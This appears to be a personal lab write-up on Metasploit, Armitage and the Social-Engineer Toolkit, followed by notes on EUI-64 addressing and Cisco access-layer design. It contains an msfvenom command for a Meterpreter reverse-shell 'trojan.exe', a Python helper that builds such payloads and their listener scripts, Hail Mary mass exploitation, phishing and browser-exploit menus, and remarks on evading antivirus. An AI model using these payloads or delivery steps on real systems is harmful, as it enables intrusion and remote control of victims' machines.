Metasploit & Armitage

Armitage is a GUI front end for Metasploit: it saves you from having to remember all of the Metasploit CLI commands and it visualizes the scan results. Both tools ship with Kali Linux and work on the same Metasploit database, so once you can use one of them you can use the other as well.

I tried both; below is a guide to discovering all online machines in a subnet using Armitage:

1,  Hosts tab -> Clear Database

This prepares a clean environment (an empty Metasploit database) for the new discovery.

2,  Hosts -> Nmap Scan -> Quick Scan (OS detect) -> enter the subnet to scan

This takes a couple of minutes depending on how big the subnet is. The same step can be done with a plain nmap command on the CLI (nmap -O against the subnet; add -oX to save the XML, which msfconsole can load with db_import so Armitage sees the same hosts).

After this step you should see the operating system running on each machine; however, it could not recognize the Windows 10 machine. The reason becomes clear from how Nmap detects an operating system: it does not rely on any single service but on how the target's TCP/IP stack answers a series of probes, and it needs at least one open and one closed TCP port to build a useful fingerprint. On a Windows host, ports such as 139 and 445 are the usual candidates for the open port. When a host firewall filters every port, Nmap gets no responses to compare and cannot fingerprint the host. The Nmap reference guide describes OS detection as follows:

“One of Nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines practically every bit in the responses. After performing dozens of tests such as TCP ISN sampling, TCP options support and ordering, IP ID sampling, and the initial window size check, Nmap compares the results to its nmap-os-db database of more than 2,600 known OS fingerprints and prints out the OS details if there is a match. Each fingerprint includes a freeform textual description of the OS, and a classification which provides the vendor name (e.g. Sun), underlying OS (e.g. Solaris), OS generation (e.g. 10), and device type (general purpose, router, switch, game console, etc). Most fingerprints also have a Common Platform Enumeration (CPE) representation, like cpe:/o:linux:linux_kernel:2.6.”

When scanning a Windows 10 machine we see a message like "All ... scanned ports ... are filtered". Below is an example of scanning a Windows 10 machine:

root@kali:/# nmap -O

Starting Nmap 7.40 ( ) at 2017-10-05 04:58 EDT
Nmap scan report for juhao.lan (
Host is up (0.014s latency).
All 1000 scanned ports on juhao.lan ( are filtered
MAC Address: AC:D1:B8:E4:3F:E7 (Hon Hai Precision Ind.)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 24.20 seconds

3, When the scan completes, every online machine is listed as an icon in the workspace. Attacks -> Find Attacks queries the database for exploits matching each host's detected OS and services, and Attacks -> Hail Mary launches every one of those exploits against the targets in turn. Hail Mary is extremely noisy (it can crash fragile services and will light up any IDS), so it belongs in a lab or in an engagement with explicit authorization.
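Step 2 above produces Nmap results that Armitage stores in its database; the same triage can be done directly on the XML from nmap -O -oX. The following Python is an added example, not code from the original notes or from the Nmap or Armitage projects: it parses Nmap XML, records the open, closed and filtered port counts and the OS match for each live host, and flags hosts like the Windows 10 machine above where every port was filtered, so Nmap never had the open/closed port pair it needs for a fingerprint. The embedded XML is a constructed sample modelled on the scan output shown above (192.0.2.0/24 is a documentation range; the Linux host is invented).

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample (not real scan output). Host .10 mirrors the Windows 10 result
# above: all 1000 ports filtered, no usable fingerprint. Host .20 is a made-up Linux
# box with one open and many closed ports, which is what OS detection wants to see.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -O -oX - 192.0.2.0/24" version="7.40">
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.10" addrtype="ipv4"/>
<address addr="AC:D1:B8:E4:3F:E7" addrtype="mac" vendor="Hon Hai Precision Ind."/>
<hostnames><hostname name="juhao.lan" type="PTR"/></hostnames>
<ports><extraports state="filtered" count="1000"/></ports>
<os/>
</host>
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.20" addrtype="ipv4"/>
<address addr="00:21:86:B5:6E:10" addrtype="mac"/>
<hostnames/>
<ports><extraports state="closed" count="999"/>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh"/></port>
</ports>
<os><osmatch name="Linux 3.2 - 4.9" accuracy="100"/></os>
</host>
<host><status state="down" reason="no-response"/>
<address addr="192.0.2.30" addrtype="ipv4"/>
</host>
</nmaprun>
"""


@dataclass
class HostSummary:
    ip: str
    mac: Optional[str]
    vendor: Optional[str]
    hostname: Optional[str]
    open_ports: List[int]
    closed: int
    filtered: int
    os_guess: Optional[str]      # single best osmatch, None if none or ambiguous
    fingerprintable: bool        # Nmap saw at least one open and one closed TCP port


def summarize_nmap_xml(xml_text: str) -> List[HostSummary]:
    """Collect per-host port-state counts and the OS match from Nmap XML output."""
    root = ET.fromstring(xml_text)
    hosts: List[HostSummary] = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue                                  # only live hosts, as Armitage shows them
        ip = mac = vendor = None
        for addr in host.findall("address"):
            if addr.get("addrtype") == "mac":
                mac, vendor = addr.get("addr"), addr.get("vendor")
            elif addr.get("addrtype") in ("ipv4", "ipv6"):
                ip = addr.get("addr")
        hn = host.find("hostnames/hostname")
        hostname = hn.get("name") if hn is not None else None

        open_ports: List[int] = []
        closed = filtered = 0
        ports = host.find("ports")
        if ports is not None:
            # <extraports> summarises the ports Nmap did not list individually
            for extra in ports.findall("extraports"):
                n = int(extra.get("count", "0"))
                if extra.get("state") == "closed":
                    closed += n
                elif extra.get("state") == "filtered":
                    filtered += n
            for port in ports.findall("port"):
                state_el = port.find("state")
                state = state_el.get("state") if state_el is not None else None
                if state == "open":
                    open_ports.append(int(port.get("portid")))
                elif state == "closed":
                    closed += 1
                elif state == "filtered":
                    filtered += 1

        matches = host.findall("os/osmatch")
        os_guess = None
        if matches:
            best = max(int(m.get("accuracy", "0")) for m in matches)
            top = [m.get("name") for m in matches if int(m.get("accuracy", "0")) == best]
            os_guess = top[0] if len(top) == 1 else None   # several equal matches: ambiguous

        hosts.append(HostSummary(ip, mac, vendor, hostname, sorted(open_ports), closed,
                                 filtered, os_guess, bool(open_ports) and closed > 0))
    return hosts


def triage_line(h: HostSummary) -> str:
    """One line per host, saying why there is no OS guess when there is none."""
    if h.os_guess:
        verdict = f"os={h.os_guess}"
    elif not h.open_ports and h.closed == 0:
        verdict = (f"os=? all {h.filtered} ports filtered "
                   "(host firewall; no open/closed pair to fingerprint)")
    else:
        verdict = "os=? (ambiguous fingerprint)"
    return (f"{h.ip:<15} {h.hostname or '-':<12} mac={h.mac or '-'} "
            f"({h.vendor or '-'}) open={h.open_ports} {verdict}")


if __name__ == "__main__":
    for summary in summarize_nmap_xml(SAMPLE_XML):
        print(triage_line(summary))
```

The "all ports filtered" case is the one to look at before blaming Nmap: a Windows host with the firewall on answers nothing, so try a service scan on ports the firewall is likely to permit, or run the scan from inside the trust boundary, rather than rerunning -O with more aggressive options.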

Unfortunately, when I tried Hail Mary against my Windows 7 and Windows 8.1 machines, none of them got compromised. Again it looks like all those attacks in Metasploit are already well known and cannot be a serious threat in the real world.

To get a successful attack we can also use a Metasploit payload on its own. I tested the classic payload windows/meterpreter/reverse_tcp.

In short, a malicious .exe is generated with msfvenom like this:

# msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=<attacker ip> LPORT=4444 -o /root/Desktop/trojan.exe

msfvenom is the Metasploit tool that generates standalone payloads, here a Windows executable carrying the Meterpreter stager. The file has to be transferred to the target machine and executed there; when it runs it connects back to LHOST:LPORT, where a Metasploit handler (exploit/multi/handler configured with the same payload) must already be listening, and that connection is the backdoor session.
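The listener half of this workflow is easy to get wrong: the .exe only yields a session if exploit/multi/handler is already waiting on LHOST:LPORT with exactly the payload that msfvenom built. The Python helper below is an added example, not code from the original notes or from the Metasploit project. It derives the msfvenom command line and a matching msfconsole resource script from one set of parameters and rejects two classic mistakes, an LHOST that is a placeholder rather than a reachable address and an architecture flag that does not match the payload. The payload table, addresses and output paths are assumptions for the example.

```python
import ipaddress
import shlex
from typing import List, Optional

# Architecture msfvenom must build for each payload. Assumption: the table is
# limited to the two classic Windows Meterpreter reverse_tcp stagers.
PAYLOAD_ARCH = {
    "windows/meterpreter/reverse_tcp": "x86",
    "windows/x64/meterpreter/reverse_tcp": "x64",
}


def check_listener(lhost: str, lport: int) -> None:
    """Reject values that cannot possibly receive a connect-back."""
    ip = ipaddress.ip_address(lhost)          # ValueError for placeholders like "attacker ip"
    if ip.is_loopback or ip.is_unspecified:
        raise ValueError(f"LHOST {lhost} is not an address the target can reach")
    if not 1 <= lport <= 65535:
        raise ValueError(f"LPORT {lport} out of range")


def msfvenom_cmd(payload: str, lhost: str, lport: int, out_path: str,
                 arch: Optional[str] = None, encoder: Optional[str] = None,
                 iterations: int = 1) -> List[str]:
    """argv for msfvenom; the architecture is taken from the payload, not guessed."""
    check_listener(lhost, lport)
    want = PAYLOAD_ARCH.get(payload)
    if want is None:
        raise ValueError(f"unknown payload {payload}")
    if arch is not None and arch != want:
        raise ValueError(f"{payload} is a {want} payload; -a {arch} will not produce a working stager")
    cmd = ["msfvenom", "-p", payload, "--platform", "windows", "-a", want, "-f", "exe",
           f"LHOST={lhost}", f"LPORT={lport}", "-o", out_path]
    if encoder:                                 # e.g. x86/shikata_ga_nai with -i rounds
        cmd += ["-e", encoder, "-i", str(iterations)]
    return cmd


def handler_rc(payload: str, lhost: str, lport: int) -> str:
    """msfconsole resource script for the matching multi/handler (run with msfconsole -q -r FILE)."""
    check_listener(lhost, lport)
    if payload not in PAYLOAD_ARCH:
        raise ValueError(f"unknown payload {payload}")
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",            # must equal the string given to msfvenom -p
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",           # keep listening after the first session arrives
        "exploit -j -z",                     # background job, do not auto-interact
    ]) + "\n"


if __name__ == "__main__":
    # Example parameters (assumed): attacker at 10.0.0.5, listening on 4444.
    argv = msfvenom_cmd("windows/meterpreter/reverse_tcp", "10.0.0.5", 4444,
                        "/root/Desktop/trojan.exe", encoder="x86/shikata_ga_nai", iterations=5)
    print(shlex.join(argv))
    print(handler_rc("windows/meterpreter/reverse_tcp", "10.0.0.5", 4444))
```

Start the handler (msfconsole -q -r handler.rc) before the executable is launched on the target; if the payload string in the resource script differs from the one given to msfvenom, the target will connect back but the handler cannot stage it and no usable session appears.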

The real challenge is actually getting this .exe onto the victim machine. I am using my own machine for the test but could not even load the file onto it. I tried sending it to myself by email, but the attachment was blocked because Google detected malware in it. I tried copying the file onto a USB stick, but as soon as I inserted the USB into my test machine the malware was removed by Windows Defender. The author recommended using an encoder, for example Veil-Evasion, to disguise the .exe file; I need to find time to try this.





Social Engineering Toolkit

I tried these tools under Kali Linux; below are some notes:


Kali Linux image: Kali Linux 64-bit VMware VM (the official Kali Linux VMware image)

VMware Fusion: 8.5.8

To start up, type:

root@kali:/# setoolkit

The main menu is displayed as below:

Select from the menu:

1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

I tried 1, which leads to the submenu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules

There is a lot of material about SET online; I only did a very basic lab for item 2, and tried item 1 as well but without success.

Item 1 -> Perform a Mass Email Attack -> 15) Custom EXE to VBA (sent via RAR) (RAR required) -> 2) Windows Meterpreter Reverse_TCP

After entering LHOST and the port, I got the following error:

IP address for the payload listener (LHOST):
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443…
[*] All good! The directories were created.
[-] Generating fileformat exploit…

[!] Something went wrong, printing the error: name ‘a’ is not defined

Item 2) Website Attack Vectors ->

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method

99) Return to Main Menu


The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: n
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address or hostname for the reverse connection:

1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo

set:webattack> Select a template:1

Enter the browser exploit you would like to use [8]:

1) Adobe Flash Player ByteArray Use After Free (2015-07-06)
2) Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
3) Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
4) MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)
5) MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)
6) Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)
7) Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)
8) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)
9) Java Applet JMX Remote Code Execution (2013-01-10)
10) MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)
11) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
12) Java 7 Applet Remote Code Execution (2012-08-26)
13) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
14) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
15) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
16) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
17) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
18) Adobe Flash Player Object Type Confusion (2012-05-04)
19) Adobe Flash Player MP4 “cprt” Overflow (2012-02-15)
20) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
21) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
22) MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)
23) Adobe Flash Player SWF Memory Corruption Vulnerability (2011-04-11)
24) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
25) Internet Explorer CSS Import Use After Free (2010-11-29)
26) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
27) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
28) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
29) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
30) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
31) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
32) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
33) Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow (2010-09-07)
34) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
35) Microsoft Help Center XSS and Command Execution (2010-06-09)
36) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
37) Microsoft Internet Explorer “Aurora” Memory Corruption (2010-01-14)
38) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
39) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
40) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
41) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
42) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
43) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
44) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
45) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
46) Metasploit Browser Autopwn (USE AT OWN RISK!)


1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
6) Windows Meterpreter Egress Buster Spawn a meterpreter shell and

With this, Kali starts a web server (listening on port 8080 by default for this method) that serves the template page with the chosen browser exploit embedded. What is left is to convince a victim to visit that site. As soon as the link was clicked, I could see a burst of Java applets and exploit attempts being pushed at the victim's browser, each trying to open a session back to the Kali machine. This is the basic example of an attack that relies on luring a victim into clicking a malicious link.

Once the attack is successful, in theory I will see active sessions on Kali by typing "sessions".

Windows Reverse_TCP Meterpreter is a well-known way to build a backdoor session to the victim machine, and has been regarded as the option with the highest chance of a successful attack. Unfortunately this is no longer the case. It might still be a useful attack against Windows XP with no firewall or Defender active. When I tried it against a victim running Windows 8.1 with an updated Windows Defender, Defender popped up and removed the malware immediately, and I got no active session from my Kali machine. In particular, when I used Chrome or Firefox, I could tell that the attempt was blocked by the browser itself as well.

SET is a great tool for learning attack concepts and ideas, but very likely most of the modules and tools available in SET are not useful for attacking a real business environment where servers, firewalls, IDS and other systems are fully patched and well protected.




EUI48 vs EUI64

Quoted from an online answer on the topic:

Historically, both EUI-48 and MAC-48 were concatenations of a 24-bit OUI (Organizationally Unique Identifier) assigned by the IEEE and a 24-bit extension identifier assigned by the organization with that OUI assignment (NIC). The subtle difference between EUI-48 and MAC-48 was not well understood; as a result, the term MAC-48 is now obsolete and the term EUI-48 is used for both (but the terms “MAC” and “MAC address” are still used).

In other words, EUI-48 and a device's MAC address are the same thing. It is usually written as 12 hex digits (e.g. 0023.a34e.abc9), i.e. 48 bits or 6 bytes.

With the EUI-64 (64-bit Extended Unique Identifier) format, a host can derive a unique 64-bit IPv6 interface identifier for itself without manual configuration or DHCP, so it is an IPv6 matter. For anyone interested in how it is calculated, it is derived from the MAC address like this:

The 48-bit MAC address is split in half, the hex group FFFE is inserted in the middle (after the 24th bit), and the seventh bit of the first octet (the universal/local bit, value 0x02) is inverted.

Because the interface identifier embeds the MAC, any peer that sees such an IPv6 address learns the hardware address and vendor of the interface and can track the host across networks; this is why current stacks default to RFC 4941 privacy extensions or RFC 7217 stable opaque identifiers instead.


The MAC address    0021.86b5.6e10      (48 bit) becomes 
the EUI-64 address 0221.86ff.feb5.6e10 (64 bit)
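The conversion above as an added Python example (not code from the quoted answer or any project): it accepts colon, dash and Cisco dotted MAC notation, builds the modified EUI-64 interface identifier and the resulting fe80::/64 link-local address, and also reverses the transformation to recover the MAC from an address, which is exactly the information leak that EUI-64 addressing causes. The MACs used are the one from the example above and the one from the Nmap output earlier on this page.

```python
import ipaddress
import re
from typing import Optional


def parse_mac(mac: str) -> bytes:
    """Accept 00:21:86:b5:6e:10, 00-21-86-b5-6e-10 or Cisco-style 0021.86b5.6e10."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return bytes.fromhex(digits)


def modified_eui64(mac: str) -> bytes:
    """EUI-48 -> modified EUI-64 as used for IPv6 interface identifiers (RFC 4291, Appendix A)."""
    m = parse_mac(mac)
    eui = bytearray(m[:3] + b"\xff\xfe" + m[3:])   # insert FFFE after the 24-bit OUI
    eui[0] ^= 0x02                                 # flip the U/L bit, 7th bit of the first octet
    return bytes(eui)


def cisco_dotted(raw: bytes) -> str:
    """Render bytes as the dotted 4-hex-digit groups used in the example above."""
    h = raw.hex()
    return ".".join(h[i:i + 4] for i in range(0, len(h), 4))


def link_local_from_mac(mac: str) -> ipaddress.IPv6Address:
    """fe80::/64 prefix followed by the modified EUI-64 interface identifier."""
    return ipaddress.IPv6Address(b"\xfe\x80" + bytes(6) + modified_eui64(mac))


def mac_from_eui64_address(addr: str) -> Optional[str]:
    """Reverse the transformation: an EUI-64 derived address leaks the MAC to every peer.
    Returns None when the interface ID does not carry the ff:fe marker."""
    iid = ipaddress.IPv6Address(addr).packed[8:]
    if iid[3:5] != b"\xff\xfe":
        return None
    raw = bytearray(iid[:3] + iid[5:])
    raw[0] ^= 0x02                                 # undo the U/L bit flip
    return ":".join(f"{b:02x}" for b in raw)


if __name__ == "__main__":
    for mac in ("0021.86b5.6e10", "AC:D1:B8:E4:3F:E7"):
        addr = link_local_from_mac(mac)
        print(mac, "->", cisco_dotted(modified_eui64(mac)), "->", addr,
              "-> recovered", mac_from_eui64_address(str(addr)))
```

The same check works the other way round for a defender: run mac_from_eui64_address over the IPv6 addresses seen in logs or neighbour tables, and every non-None result is a host that is advertising its hardware address to the network.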

Access layer design

The following notes are taken from Cisco's data center infrastructure design guide:

1, Looped triangle

The triangle looped topology is currently the most widely implemented in the enterprise data center. This topology provides a deterministic design that makes it easy to troubleshoot while providing a high level of flexibility.

2, looped square

The square-based looped topology is not as common today in the enterprise data center but has recently gained more interest. The square looped topology increases the access layer switch density when compared to a triangle loop topology while retaining the same loop topology characteristics. This becomes particularly important when 10GE uplinks are used. This topology is very similar to the triangle loop topology, with differences in where spanning tree blocking occurs.

Spanning tree blocks the link between the access layer switches, with the lowest cost path to root being via the uplinks to the aggregation switches, as shown in Figure 6-9. This allows both uplinks to be active to the aggregation layer switches while providing a backup path in the event of an uplink failure. The backup path can also be a lower bandwidth path because it is used only in a backup situation. This might also permit configurations such as 10GE uplinks with GEC backup.

The possible disadvantages of the square loop design relate to inter-switch link use, because 50 percent of access layer traffic might cross the inter-switch link to reach the default gateway/active service module. There can also be degradation in performance in the event of an uplink failure because, in this case, the oversubscription ratio doubles.
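Where spanning tree blocks in these two topologies can be checked with a small model of the 802.1D port-role election. The Python below is an added example and not from the Cisco guide: bridge IDs are stand-in integers (in reality priority plus MAC), 10GE links carry the RSTP long path cost of 2000, and port roles follow the standard rule (lowest root path cost, then lowest sender bridge ID). It shows the triangle blocking the access switch's second uplink, the square blocking the inter-switch link at the access switch that is farther from the root, and, once one uplink in the square fails, all of that access switch's traffic being forced across the inter-switch link and the remaining uplink, which is the oversubscription doubling described above. Switch names and costs are assumptions.

```python
import heapq
from typing import Dict, List, Tuple

Link = Tuple[str, str, int]        # (switch A, switch B, port path cost)
TENGIG, GIG = 2000, 20000          # 802.1D-2004 / RSTP long path costs for 10GE and 1GE

# Stand-in bridge IDs: lowest wins the root election. agg1 is the STP root.
TRIANGLE_BRIDGES = {"agg1": 4096, "agg2": 8192, "acc1": 32768}
TRIANGLE_LINKS: List[Link] = [("agg1", "agg2", TENGIG), ("agg1", "acc1", TENGIG),
                              ("agg2", "acc1", TENGIG)]

SQUARE_BRIDGES = {"agg1": 4096, "agg2": 8192, "acc1": 32768, "acc2": 32769}
SQUARE_LINKS: List[Link] = [("agg1", "agg2", TENGIG), ("agg1", "acc1", TENGIG),
                            ("agg2", "acc2", TENGIG), ("acc1", "acc2", TENGIG)]


def _adjacency(bridges: Dict[str, int], links: List[Link]):
    adj = {b: [] for b in bridges}
    for a, b, cost in links:
        adj[a].append((b, cost))
        adj[b].append((a, cost))
    return adj


def root_path_costs(bridges: Dict[str, int], links: List[Link]) -> Tuple[str, Dict[str, int]]:
    """Root bridge is the lowest bridge ID; root path cost is the cheapest path to it."""
    root = min(bridges, key=lambda b: (bridges[b], b))
    adj = _adjacency(bridges, links)
    dist = {b: float("inf") for b in bridges}
    dist[root] = 0
    heap = [(0, root)]
    while heap:
        d, u = heapq.heappop(heap)
        if d > dist[u]:
            continue
        for v, c in adj[u]:
            if d + c < dist[v]:
                dist[v] = d + c
                heapq.heappush(heap, (dist[v], v))
    return root, dist


def stp_port_roles(bridges: Dict[str, int], links: List[Link]) -> Dict[Tuple[str, str], str]:
    """Role of the port on `switch` facing `peer`, keyed (switch, peer):
    'root', 'designated' or 'blocked' (an alternate port that is neither)."""
    root, rpc = root_path_costs(bridges, links)
    adj = _adjacency(bridges, links)
    root_port = {}
    for b in bridges:
        if b == root:
            continue
        # best received BPDU: lowest root path cost, then lowest sender bridge ID
        _, _, nbr = min((rpc[n] + c, bridges[n], n) for n, c in adj[b])
        root_port[b] = nbr
    roles = {}
    for a, b, _ in links:
        for me, peer in ((a, b), (b, a)):
            if me != root and root_port[me] == peer:
                roles[(me, peer)] = "root"
            elif (rpc[me], bridges[me]) < (rpc[peer], bridges[peer]):
                roles[(me, peer)] = "designated"   # this end sends the better BPDU on the link
            else:
                roles[(me, peer)] = "blocked"
    return roles


def blocked_links(roles: Dict[Tuple[str, str], str]) -> List[Tuple[str, str]]:
    """Links with a blocked end, as sorted (switch, switch) pairs."""
    return sorted({tuple(sorted(k)) for k, r in roles.items() if r == "blocked"})


def without(links: List[Link], a: str, b: str) -> List[Link]:
    """Simulate a link failure by removing the a-b link."""
    return [l for l in links if {l[0], l[1]} != {a, b}]


if __name__ == "__main__":
    for name, bridges, links in (("looped triangle", TRIANGLE_BRIDGES, TRIANGLE_LINKS),
                                 ("looped square", SQUARE_BRIDGES, SQUARE_LINKS)):
        print(name, "blocked:", blocked_links(stp_port_roles(bridges, links)))
    failed = stp_port_roles(SQUARE_BRIDGES, without(SQUARE_LINKS, "agg1", "acc1"))
    print("square with agg1-acc1 down: acc1 reaches the root via", failed[("acc1", "acc2")],
          "port towards acc2; blocked:", blocked_links(failed))
```

Swapping the access switches' bridge IDs moves the blocked end of the inter-switch link but not the link itself, and changing the inter-switch link to GIG (the "GEC backup" case in the text) leaves the roles unchanged because the uplinks are already the cheaper path to the root.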

3, Loop free U

4, Loop free inverted U